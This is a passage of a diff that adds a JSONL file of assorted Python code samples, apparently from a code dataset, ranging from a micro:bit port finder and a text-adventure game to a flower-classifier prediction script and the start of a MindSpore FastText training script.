diff --git "a/5987.jsonl" "b/5987.jsonl" new file mode 100644--- /dev/null +++ "b/5987.jsonl" @@ -0,0 +1,762 @@ +{"seq_id":"47279300","text":"import serial\n\nconn = serial.Serial()\nconn.baudrate = 115200\nconn.timeout = .5\n\ndef get_microbit():\n for x in range(1, 10):\n try:\n conn.port = \"COM\" + str(x)\n conn.open()\n conn.write(\"\\n\".encode(\"utf-8\"))\n new = conn.read_until(b\"microbitfound \\r\\n\")\n try:\n if new.decode().startswith(\"microbitfound\"):\n conn.close()\n return \"COM\" + str(x)\n except UnicodeDecodeError:\n continue\n except serial.SerialException as e:\n continue\n return False","sub_path":"src/microbit.py","file_name":"microbit.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"25537331","text":"from django.core.cache import cache\r\nimport os, requests, json\r\n\r\n\r\n\r\ndef my_scheduled_job():\r\n pass\r\n\r\ndef get_real_news_articles():\r\n news_articles_response = requests.get(f'https://newsapi.org/v2/top-headlines?country=us&apiKey={os.getenv(\"NEWS_API_KEY\")}')\r\n # check if request failed\r\n if news_articles_response.status_code != 200:\r\n raise Exception(\"Failed making API request.\")\r\n news_articles = news_articles_response.json()\r\n articles = news_articles[\"articles\"]\r\n for article in articles:\r\n cache.set(f'article:{article[\"title\"]}', article, timeout=3600)\r\n print(article)\r\n\r\ndef get_fake_news_data():\r\n test_queries = ['bacon', 'snake', 'slug', 'pizza', 'candy']\r\n request_key = {'Api-Key': os.getenv(\"IMAGE_API_KEY\")}\r\n\r\n for query in test_queries:\r\n\r\n request_url = f'https://api.deepai.org/api/text2img?text={query}'\r\n fake_images_response = requests.post(request_url, headers=request_key)\r\n # check if request failed\r\n if fake_images_response.status_code != 200:\r\n raise Exception(\"Failed making API request for image.\")\r\n fake_image = fake_images_response.json()\r\n # articles = news_articles[\"articles\"]\r\n # for article in articles:\r\n cache.set(f'fake_image:{fake_image[\"id\"]}', fake_image, timeout=3600)\r\n print(fake_image)\r\n\r\n # get a fake title\r\n fake_title_response = requests.get(\"https://clickbait-generator.herokuapp.com/api\")\r\n # check if request failed\r\n if fake_title_response.status_code != 200:\r\n raise Exception(\"Failed making API request for title.\")\r\n fake_title = fake_title_response.json()\r\n cache.set(f'fake_title:{fake_title[\"title\"]}', fake_title, timeout=3600)\r\n print(fake_title)\r\n\r\n\r\n ","sub_path":"news/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"403361759","text":"\"\"\" Wzorzec klasy:\r\nfig = [ 'typ_figury', #pole typfig\r\n [x, y], #srodek okregu, lewy-gorny rog kwadratu\r\n t #dlugosc boku/ promien\r\n ]\r\n\"\"\"\r\n\r\ndef Figura(typfig, x, y, t=0): #konstruktor\r\n if typfig not in [\"point\", \"circle\", \"square\"]:\r\n print(\"Unexpected figure, try 'point', 'circle' or 'square'.\")\r\n return None\r\n print(\"Object \\'\"+ typfig+ \"\\' has been created, x = \", x, \", y =\", y)\r\n if typfig == \"point\":\r\n return [ typfig, [x, y] ]\r\n else:\r\n return [ typfig, [x, y], t ]\r\n\r\ndef narysuj(Figura):\r\n if Figura[0] == 'point':\r\n print(Figura[0], \"has been printed.\\n(x, y) = (%.4f, %.4f)\" % (Figura[1][0], Figura[1][1]) )\r\n elif Figura[0] == 'square':\r\n print(Figura[0], \"with arm length =\", Figura[2], \"has been printed.\")\r\n elif Figura[0] == 'circle':\r\n print(Figura[0], \"with radius =\",Figura[2], \"and center at (x, y) =\",Figura[1], \"has been printed.\")\r\n else:\r\n print(\"Error\")\r\n \r\ndef przesun(Figura, x, y):\r\n old = (float(Figura[1][0]), float(Figura[1][1]))\r\n new = (float(Figura[1][0] + x), float(Figura[1][1] + y))\r\n Figura[1][0] += float(x)\r\n Figura[1][1] += float(y)\r\n print(\"Move from [%.4f, %.4f] to [%.4f, .%4f]\" % ( old[0], old[1], new[0], new[1]) )\r\n \r\ndef zawiera(Figura, x, y):\r\n typfig = Figura[0]\r\n X, Y = Figura[1]\r\n if typfig == 'square':\r\n t = Figura[2]\r\n if ( x >= X and x <= (X+t) ) and ( y >= Y and y <= (Y+t) ):\r\n return 1\r\n return -1\r\n elif typfig == 'circle':\r\n r = Figura[2] **2\r\n R = (X-x)**2 + (Y-y)**2\r\n if R <= r:\r\n return 1\r\n return -1\r\n elif typfig == 'point':\r\n if x == X and y == Y:\r\n return 1\r\n return -1\r\n\r\n\r\n","sub_path":"Lista1/Figura.py","file_name":"Figura.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"57755213","text":"import pickle\nimport os\n#Attributes in dat files\n# 'author'\n#'burk_count', 'pant_count', 'fin_count', 'interp_count', 'pact_count', 'adja_count', 'ppron12_count', 'adj_count', 'impt_count', 'praet_count', 'imps_count', 'comp_count', 'ppas_count', 'prep_count', 'depr_count', 'inf_count', 'ppron3_count', 'ger_count', 'aglt_count', 'pred_count', 'adv_count', 'conj_count', 'winien_count', 'siebie_count', 'adjp_count', 'noun_count', 'pcon_count', 'brev_count', 'qub_count', 'bedzie_count', 'num_count', 'interj_count', 'adjc_count', 'subst_count', 'verb_count', 'numcol_count'\nf = open(\"tytuly.txt\")\npath = 'datFilesNew/'\nfor fileName in os.listdir(path):\n\ttry:\n\t\tfilePath = 'datFilesNew/' + fileName\n\t\t#filePath = 'datFilesNew/do-franciszka-szemiotha.dat'\n\t\tfile = open(filePath,'rb')\n\t\tprint(filePath)\n\t\tdata = pickle.load( file )\n\t\tprint ('noun: ', data['noun_count'],' in file: ',fileName, ' author: ', data['author'])\n\texcept IOError:\n\t\tprint('Error in file: ',fileName)\n\n","sub_path":"data/readDat.py","file_name":"readDat.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"362968085","text":"\"\"\"\n Loading and running every scenario\n\"\"\"\n\n# local imports\nfrom .game_io import prompt_in, send_out\nfrom .player import Player\n\n\ndef scenario(player, scenario_id):\n \"\"\" Loads into the scenario \"\"\"\n print(\"From scenario \" + str(player.id))\n if scenario_id == \"start\":\n send_out(\n \"You are in a white, bare room with nothing but a mirror with a few words on it.\"\n + \"Upon further inspection the mirror seems to be asking you a question, “Who are you?”\",\n player.id,\n )\n return (player, \"intro\")\n if scenario_id == \"intro\":\n send_out(\n \"You wake up at your desk in class, with no one in sight. Strangely enough, \"\n + \"it looks like everyone has left only recently and forgotten their things.\",\n player.id,\n )\n action = prompt_in()\n looted = False\n while action:\n if parse(action)[\"loot\"]:\n if not looted:\n send_out(\"You find $20 in people's bags.\", player.id)\n player.money += 20\n looted = True\n else:\n send_out(\"You've already looted everything!\", player.id)\n if parse(action)[\"look\"]:\n send_out(\"It seems dark outside...\", player.id)\n if parse(action)[\"leave\"]:\n send_out(\"You leave the room.\", player.id)\n return (player, \"intro_hall\")\n action = prompt_in()\n if scenario_id == \"intro_hall\":\n send_out(\n \"As you leave the room, you notice that the hallway is empty as well,\"\n + \"with some strange gray trails all heading either towards or from the main entrance.\",\n player.id,\n )\n send_out(\"Where do you go?\", player.id)\n action = prompt_in()\n next_area = None\n while not next_area:\n if \"classroom\" in action or \"away\" in action:\n next_area = \"classroom\"\n break\n if \"entrance\" in action or \"towards\" in action:\n next_area = \"entrance\"\n break\n action = prompt_in()\n send_out(\n \"As you approach, there is a slow and constant squishing sound,\"\n + \"like the noises of an oversaturated bath towel.\",\n player.id,\n )\n return (player, next_area)\n if scenario_id == \"classroom\":\n send_out(\n \"Peeking in, you find a strange gray mass that rests on top of the trail. The stra\"\n + \"nger thing is that the room itself seems to lack color wherever this mass goes.\",\n player.id,\n )\n action = prompt_in()\n slime_alive = True\n while action:\n if parse(action)[\"fight\"] and slime_alive:\n send_out(\"You begin combat with the gray slime!\", player.id)\n slime_npc = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc)\n slime_alive = False\n if parse(action)[\"leave\"]:\n return (player, \"entrance\")\n if scenario_id == \"entrance\":\n send_out(\n \"Outside of the schoool, you find a few of your classmates and your professor, trying \"\n + \"to fend off some colorless slimes with brooms.\",\n player.id,\n )\n action = prompt_in()\n slime_alive = True\n looted = False\n while action:\n if parse(action)[\"fight\"]:\n send_out(\"You begin combat with the gray slimes!\", player.id)\n slime_npc1 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc1)\n slime_npc2 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc2)\n slime_npc3 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc3)\n slime_alive = False\n if parse(action)[\"talk\"]:\n send_out(\n \"You walk over and see your classmates wearily pushing the slimes away.\"\n + ' \"Oh, you\\'re alive!\", goes your professor. \"Come lend us a hand!\"',\n player.id,\n )\n if parse(action)[\"loot\"] and not looted:\n send_out(\"You find a broom!\", player.id)\n if parse(action)[\"quit\"]:\n return (player, \"end\")\n\n return (player, scenario_id, player.id)\n\n\ndef parse(command):\n \"\"\"\n function that parses a string and returns a map of strings->booleans based on command\n - command is a string\n \"\"\"\n d = {}\n\n # exploration\n d[\"fight\"] = \"fight\" in command or \"attack\" in command\n d[\"leave\"] = \"leave\" in command\n d[\"look\"] = \"look\" in command\n d[\"loot\"] = \"loot\" in command or \"steal\" in command\n d[\"talk\"] = \"talk\" in command\n # fighting\n d[\"attack\"] = \"attack\" in command\n d[\"melee\"] = \"melee\" in command\n d[\"range\"] = \"range\" in command\n d[\"magic\"] = \"magic\" in command\n # exit game\n d[\"quit\"] = \"quit\" in command\n\n return d\n\n\n# COMBAT COMBAT COMBAT\ndef combat(player, enemy):\n \"\"\" Simulates combat between the player and the enemy \"\"\"\n send_out(\"Player \" + player.id + \" begins combat with \" + enemy.id, player.id)\n send_out(\n \"Player \"\n + player.id\n + \" starts at \"\n + str(player.health)\n + \"/\"\n + str(player.max_health),\n player.id,\n )\n send_out(\n \"Player \"\n + enemy.id\n + \" starts at \"\n + str(enemy.health)\n + \"/\"\n + str(enemy.max_health),\n player.id,\n )\n while not player.is_dead() and not enemy.is_dead():\n # Prompt player aciton\n action = prompt_in()\n # Determine faster speed, Pokemon style\n if enemy.speed > player.speed:\n # Enemies go first\n send_out(enemy.attack(\"melee\", player), player.id)\n if parse(action)[\"attack\"]:\n send_out(player.attack(\"melee\", enemy), player.id)\n else:\n continue # we don't handle other actions right now\n else:\n # players go first\n if parse(action)[\"attack\"]:\n send_out(player.attack(\"melee\", enemy), player.id)\n send_out(enemy.attack(\"melee\", player), player.id)\n else:\n continue # we don't handle other actions right now\n winner = player.id\n if player.is_dead():\n winner = enemy.id\n send_out(\"Combat has ended! \" + winner + \" has won!\", player.id)\n","sub_path":"game/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"32714642","text":"class slink:\n def __init__(self, num, _next=None):\n self.num = num\n self.next = _next\n\n def insert(self, k):\n self.next = k\n\n def delete(self, _front, _next):\n _front.next = _next\n\n def printl(self):\n print(self.num, end=\" \")\n if self.next is not None:\n return self.next.printl()\n\n\nl = [slink(i) for i in range(10)]\nfor i in range(0, 9):\n l[i].next = l[i + 1]\nl[0].printl()\na = slink(10, l[6])\nl[5].insert(a)\nprint()\nl[0].printl()\nprint()\na.delete(l[5], l[6])\nl[0].printl()\n","sub_path":"Python/单向链表.py","file_name":"单向链表.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"198896427","text":"t=int(input())\nfor i in range(t):\n n=input()\n sum=int(n)\n while sum>9:\n sum=0\n for j in range(0,len(n)):\n sum+=int(n[j])\n n=str(sum)\n print(sum) ","sub_path":"Code/CodeRecords/2723/60618/263243.py","file_name":"263243.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"210276677","text":"def month_name(num, lang):\n rus = {0: \"январь\",\n 1: \"февраль\",\n 2: \"март\",\n 3: \"апрель\",\n 4: \"май\",\n 5: \"июнь\",\n 6: \"июль\",\n 7: \"август\",\n 8: \"сентябрь\",\n 9: \"октябрь\",\n 10: \"ноябрь\",\n 11: \"декабрь\"}\n \n eng = {0: \"january\",\n 1: \"February\",\n 2: \"March\",\n 3: \"April\",\n 4: \"May\",\n 5: \"June\",\n 6: \"July\",\n 7: \"August\",\n 8: \"september\",\n 9: \"october \",\n 10: \"november\",\n 11: \"december\"}\n \n if lang == \"ru\":\n return rus[num - 1]\n return eng[num - 1].lower()\n","sub_path":"Lesson 20 (Функции. Возвращение значений из функций)/Homework/1. Месяц Month.py","file_name":"1. Месяц Month.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"619552483","text":"class Node:\r\n def __init__(self,data):\r\n self.data=data\r\n self.left=None\r\n self.right=None\r\n\r\nclass BinarySearchTree:\r\n def __init__(self):\r\n self.root=None\r\n\r\n def insert(self,data):\r\n n=Node(data)\r\n if self.root is None:\r\n self.root=n\r\n else:\r\n curr=self.root\r\n while True:\r\n if datacurr.data:\r\n if curr.right is None:\r\n curr.right=n\r\n break\r\n else:\r\n curr=curr.right\r\n else:\r\n break\r\n\r\nm=0\r\ndef inorder(root):\r\n global m\r\n if root is None:\r\n return m\r\n inorder(root.left)\r\n m=root.data\r\n return inorder(root.right)\r\n\r\ndef levelorder(root):\r\n m=0\r\n q=[]\r\n q.append(root)\r\n while len(q)>0:\r\n x=q.pop(0)\r\n if x.data>m:\r\n m=x.data\r\n if x.left is not None:\r\n q.append(x.left)\r\n if x.right is not None:\r\n q.append(x.right)\r\n return m\r\n\r\n\r\ndef max_node(root):\r\n #m=inorder(root)\r\n m=levelorder(root)\r\n return m\r\n\r\n\r\nob=BinarySearchTree()\r\nl=list(map(int,input().split()))\r\nfor i in l:\r\n ob.insert(i)\r\n\r\nm=max_node(ob.root)\r\nprint('Maximum value node:',m)\r\n","sub_path":"Trees/max_val_node.py","file_name":"max_val_node.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"169889152","text":"import save_load_model\nimport json\nimport torch\nfrom random import randint \nimport process_image as pima\nimport train\nimport argparse\nimport view_classify\nimport signal\n\nfrom contextlib import contextmanager\n\nimport requests\n\ndef get_input_args():\n if __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--topk', type = int, default = 5, help = 'Number of top classes to be returned') \n in_args = parser.parse_args()\n in_args_dict = vars(in_args)\n #predict_in_args_list = [v for v in in_args_dict.values()]\n print(in_args_dict)\n return in_args_dict\n # stuff only to run when not called via 'import' here\n else:\n in_args_dict = {'topk': 5}\n return(in_args_dict)\n\nDELAY = INTERVAL = 4 * 60 # interval time in seconds\nMIN_DELAY = MIN_INTERVAL = 2 * 60\nKEEPALIVE_URL = \"https://nebula.udacity.com/api/v1/remote/keep-alive\"\nTOKEN_URL = \"http://metadata.google.internal/computeMetadata/v1/instance/attributes/keep_alive_token\"\nTOKEN_HEADERS = {\"Metadata-Flavor\":\"Google\"}\n\n\ndef _request_handler(headers):\n def _handler(signum, frame):\n requests.request(\"POST\", KEEPALIVE_URL, headers=headers)\n return _handler\n\n\n@contextmanager\ndef active_session(delay=DELAY, interval=INTERVAL):\n \"\"\"\n Example:\n\n from workspace_utils import active session\n\n with active_session():\n # do long-running work here\n \"\"\"\n token = requests.request(\"GET\", TOKEN_URL, headers=TOKEN_HEADERS).text\n headers = {'Authorization': \"STAR \" + token}\n delay = max(delay, MIN_DELAY)\n interval = max(interval, MIN_INTERVAL)\n original_handler = signal.getsignal(signal.SIGALRM)\n try:\n signal.signal(signal.SIGALRM, _request_handler(headers))\n signal.setitimer(signal.ITIMER_REAL, delay, interval)\n yield\n finally:\n signal.signal(signal.SIGALRM, original_handler)\n signal.setitimer(signal.ITIMER_REAL, 0)\n\n\ndef keep_awake(iterable, delay=DELAY, interval=INTERVAL):\n \"\"\"\n Example:\n\n from workspace_utils import keep_awake\n\n for i in keep_awake(range(5)):\n # do iteration with lots of work here\n \"\"\"\n with active_session(delay, interval): yield from iterable\n\n\ndef predict(image_path, model, args, args_predict, topk=5):\n #print (\"entering predict function...\") \n img_tensor = pima.process_image(image_path)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() and args[6] == True else \"cpu\")\n #print(f\"device = {device}\")\n model.to(device)\n img_tensor = img_tensor.to(device)\n img_tensor = img_tensor.unsqueeze_(0)\n log_ps = model(img_tensor)\n ps = torch.exp(log_ps)\n ps_topk = ps.topk(topk)\n \n probs_and_classes = [ps_topk]\n print (\"outcome from predict.predict = \", probs_and_classes)\n return probs_and_classes\n\n\ndef define_image_path_for_inference():\n image_paths_100 = [\"aipnd-project_original udacity folder/flowers/test/100/image_07896.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/100/image_07897.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/100/image_07899.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07902.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07926.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07936.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07938.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07939.jpg\"]\n \n image_paths_13 = [\"aipnd-project_original udacity folder/flowers/test/13/image_05745.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/13/image_05761.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/13/image_05767.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05769.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05775.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05787.jpg\"]\n \n image_path_index = randint(0,len(image_paths_100)-1)\n image_path = image_paths_100[image_path_index]\n print(\"image path = \", image_path)\n return image_path\n\ndef prepare_and_run_prediction(image_path):\n args_train = train.get_input_args()\n args_predict = get_input_args()\n #model = import_the_checkpoint_ver2.load_checkpoint_and_rebuild_the_model(args)\n model = save_load_model.load_checkpoint_and_rebuild_the_model(args_train)\n with torch.no_grad():\n model.eval()\n #image_path = define_image_path_for_inference()\n probs_and_classes = predict(image_path, model, args_train, args_predict)\n #print(\"started topklabels \")\n topk_labels, numpy_probs = view_classify.get_topk_labels(args_predict, probs_and_classes, False)\n print(\"completed topklabels\", topk_labels)\n return probs_and_classes, topk_labels, numpy_probs\n \n \nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n image_path = define_image_path_for_inference()\n prepare_and_run_prediction(image_path)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"483621040","text":"# -*- coding: UTF-8 -*-\n\nimport cv2\nimport numpy as np\n\n\ndef histogram(image, t, w, h):\n mhist = []\n\n # 세로 -> 가로 히스토그램\n if (t == 0):\n # 90도 회전 - 가로, 세로 사이즈 반전 일어남\n img = np.rot90(image)\n\n # 현재 img의 세로 size (for문 돌리기 위함)\n size = np.size(img, 0)\n # mhist = np.zeros((size, 1), dtype=\"uint8\")\n\n\n # 가로: 원본 이미지 -> 세로 히스토그램\n else:\n img = image\n size = np.size(img, 0)\n # mhist = np.zeros((size, 1), dtype=\"uint8\")\n\n # count nonzero value\n max = -100\n for j in range(size):\n v = cv2.countNonZero(img[j])\n # mhist[j] = v\n mhist.append(v)\n if (v > max):\n max = v\n\n # 원본 이미지의 경우: 세로 히스토그램 생성\n if (t == 1):\n width = max\n height = h\n histo = np.zeros((height, width, 1), dtype=\"uint8\")\n\n for i in range(height):\n data = mhist[i]\n for j in range(width):\n if (data == 0):\n break\n else:\n histo[i][j] = 255\n data -= 1\n\n # 90도 회전 이미지의 경우: 가로 히스토그램 생성\n else:\n width = w\n height = max\n hist = np.zeros((height, width, 1), dtype=\"uint8\")\n\n for j in range(width):\n data = mhist[j]\n for i in range(height - 1, -1, -1):\n if (data == 0):\n break\n else:\n hist[i][j] = 255\n data -= 1\n\n histo = cv2.flip(hist, 1)\n mhist.reverse()\n\n return histo, mhist\n","sub_path":"Histogram2.py","file_name":"Histogram2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"243085757","text":"def same_digits(n, m):\n\tif sorted(str(n)) == sorted(str(m)):\n\t\treturn True\n\telse:\n\t\treturn False\n\ncondition = True\nn = 0\nwhile condition:\n\tn += 1\n\tfor i in range(2, 7):\n\t\tif not same_digits(n, n*i):\n\t\t\tbreak\n\t\tif i == 6:\n\t\t\tcondition = False\n\nprint(n)","sub_path":"52-permuted_multiples.py","file_name":"52-permuted_multiples.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"307459748","text":"unigram_file = open('code_unigram_stops', 'r', encoding='utf-8')\nbigram_file = open('code_bigram_stops', 'r', encoding='utf-8')\ntrigram_file = open('code_trigram_stops', 'r', encoding='utf-8')\npreprocessed_file = open('code_mid_preprocessed1', 'r', encoding='utf-8')\nfinal_file = open('code_preprocessed', 'w', encoding='utf-8')\n\nunigrams = unigram_file.readlines()\nbigrams = bigram_file.readlines()\ntrigrams = trigram_file.readlines()\nfor i in range(len(unigrams)):\n unigrams[i] = unigrams[i].strip('\\n')\nfor i in range(len(bigrams)):\n bigrams[i] = bigrams[i].strip('\\n')\nfor i in range(len(trigrams)):\n trigrams[i] = trigrams[i].strip('\\n')\nfor line in preprocessed_file:\n tokens = line.strip('\\n').split(',')\n i = 0\n while i < len(tokens) - 1:\n bi = tokens[i] + ' ' + tokens[i + 1]\n found = False\n for b in bigrams:\n if bi == b:\n tokens.pop(i)\n tokens.pop(i)\n found = True\n if not found:\n i += 1\n i = 0\n while i < len(tokens):\n uni = tokens[i]\n found = False\n for u in unigrams:\n if uni == u:\n tokens.pop(i)\n found = True\n if not found:\n i += 1\n result = ','.join(tokens)+'\\n'\n final_file.write(result)\n\nfinal_file.close()\npreprocessed_file.close()\ntrigram_file.close()\nbigram_file.close()\nunigram_file.close()\n","sub_path":"code_stop_elimate.py","file_name":"code_stop_elimate.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"471671937","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portfolio', '0008_auto_20170524_2329'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='project',\n options={'ordering': ('my_order',)},\n ),\n migrations.AddField(\n model_name='project',\n name='my_order',\n field=models.PositiveIntegerField(default=0),\n ),\n migrations.AlterField(\n model_name='photo',\n name='caption',\n field=ckeditor.fields.RichTextField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='project',\n name='description',\n field=ckeditor.fields.RichTextField(blank=True, help_text='Project description'),\n ),\n ]\n","sub_path":"portfolio/migrations/0009_auto_20170529_1901.py","file_name":"0009_auto_20170529_1901.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"48194816","text":"import tkinter as tk\n\nfrom theme import *\n\nbtn_cnf = {\n \"bg\": DARK,\n \"fg\": FG,\n \"relief\": tk.FLAT,\n \"font\": (\"Roboto\", 13),\n \"cursor\": \"hand2\",\n \"activebackground\": DARK,\n \"activeforeground\": PRIM,\n \"bd\": 0,\n}\nbtn_nav_cnf = {\n **btn_cnf,\n \"font\": (\"Roboto\", 14, \"bold\"),\n 'width': 14\n}\nbtn_head_cnf = {\"width\": 2, \"font\": (\"Roboto\", 14), \"bg\": DARK}\nbtn_normal_cnf_cfg = {\"fg\": FG, \"bg\": DARK}\nbtn_hover_cnf_cfg = {\"fg\": PRIM}\nbtn_normal_from_hover_cnf_cfg = {\"fg\": btn_normal_cnf_cfg[\"fg\"]}\nbtn_active_cnf_cfg = {\n \"bg\": PRIM,\n \"fg\": DARK,\n}\nlb_cnf = {\"bg\": DARK, \"fg\": FG, \"font\": (\"Roboto\", 11)}\nseclb_cnf = {\"bg\": DARK, \"fg\": PRIM, \"font\": (\"Roboto\", 8)}\nbiglb_cnf = {**lb_cnf, 'fg': PRIM, 'font': ('Segoe UI', 24)}\nhlb_cnf = {\"bg\": DARK, \"fg\": PRIM, \"font\": (\"Roboto\", 11, \"bold\"), 'anchor': 'w'}\nwrnlb_cnf = {\n \"bg\": DARK,\n \"fg\": \"red\",\n \"font\": (\"Roboto Light\", 9, \"bold\"),\n \"wraplength\": 290\n}\nfrm_cnf = {\"bg\": DARK, \"padx\": 4, \"pady\": 0}\ncont_frm_cnf = {**frm_cnf, **{\"pady\": 4}}\nnav_frm_cnf = {**frm_cnf, **{\"padx\": 0, \"bg\": DARK}}\nlbfrm_cnf = {\n \"bg\": DARK,\n \"padx\": 4,\n \"pady\": 4,\n \"fg\": PRIM,\n \"font\": (\"Roboto\", 11, \"bold\"),\n \"bd\": 0,\n \"highlightbackground\": PRIM,\n \"highlightthickness\": \"1\",\n \"labelanchor\": \"n\"\n}\ncnv_cnf = {\"highlightthickness\": 0, \"highlightbackground\": \"#10131a\"}\nlistbox_cnf = {\n \"bg\": SEC,\n \"font\": (\"Roboto\", 11),\n \"fg\": FG,\n \"relief\": 'flat',\n \"selectbackground\": PRIM,\n \"selectmode\": 'extended',\n \"highlightthickness\": 10,\n \"highlightbackground\": SEC,\n \"highlightcolor\": SEC,\n \"activestyle\": \"none\",\n \"cursor\": \"hand2\"\n}\nscrollbar_cnf = {\"troughcolor\": DARK}\n\nbtn_nav_pck = {\"side\": tk.LEFT, 'ipadx': 10}\nnav_frm_pck = {\"side\": tk.TOP, \"anchor\": \"w\", \"fill\": tk.X, \"expand\": True}\nhead_frm_pck = {\"side\": tk.TOP, \"fill\": tk.X}\ntitle_lb_pck = {\"side\": tk.LEFT, \"fill\": 'both', 'ipadx': 10, 'ipady': 5, 'expand': True}\nbtn_head_pck = {\"side\": tk.RIGHT, \"fill\": tk.Y}\ncnv_pck = {\"side\": tk.TOP}\n","sub_path":"style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"593626154","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndf = pd.read_csv('/Users/lpottier/research/projects/active/decaf-work/cori-runs-log/pegasus-io-1000genome.csv')\n\ndf['Size(B)'] = df['Size(B)']/(1024*1024)\ndf['MAXRSS(KB)'] = df['MAXRSS(KB)']/(1024*1024)\ndf = df.rename(columns={\"Size(B)\": \"Size(MB)\", \"MAXRSS(KB)\": \"MAXRSS(GB)\"})\n\ndf = df.groupby(['K','Trial']).max()\ndf = df.groupby('K').agg(['mean', 'std'])\n\ndf[('Size(MB)', 'mean')] = df[('Size(MB)', 'mean')].round(2)\ndf[('MAXRSS(GB)', 'mean')] = df[('MAXRSS(GB)', 'mean')].round(2)\n\npd.set_option('display.float_format', lambda x: format(x, \"5.2e\"))\nprint(df.to_latex(index=True))\nprint(df.to_markdown(index=True))\n","sub_path":"analysis/analyze-io.py","file_name":"analyze-io.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"601749421","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"FastText for train\"\"\"\nimport os\nimport time\nimport numpy as np\nfrom mindspore import context\nimport mindspore.nn as nn\nimport mindspore.ops.operations as P\nfrom mindspore.nn.optim import Adam\nfrom mindspore.common import set_seed\nfrom mindspore.train.model import Model\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.context import ParallelMode\nfrom mindspore.train.callback import Callback, TimeMonitor\nfrom mindspore.communication import management as MultiDevice\nfrom mindspore.train.callback import CheckpointConfig, ModelCheckpoint\nfrom mindspore.train.serialization import load_checkpoint, export, load_param_into_net\n\nfrom src.load_dataset import load_dataset\nfrom src.lr_schedule import polynomial_decay_scheduler\nfrom src.fasttext_train import FastTextTrainOneStepCell, FastTextNetWithLoss\nfrom src.fasttext_model import FastText\n\nfrom model_utils.config import config\nfrom model_utils.moxing_adapter import moxing_wrapper\nfrom model_utils.device_adapter import get_device_id, get_device_num\n\n\ndef get_ms_timestamp():\n t = time.time()\n return int(round(t * 1000))\n\nset_seed(5)\ntime_stamp_init = False\ntime_stamp_first = 0\ncontext.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target=config.device_target)\n\nif config.data_name == \"ag\":\n target_label1 = ['0', '1', '2', '3']\nelif config.data_name == 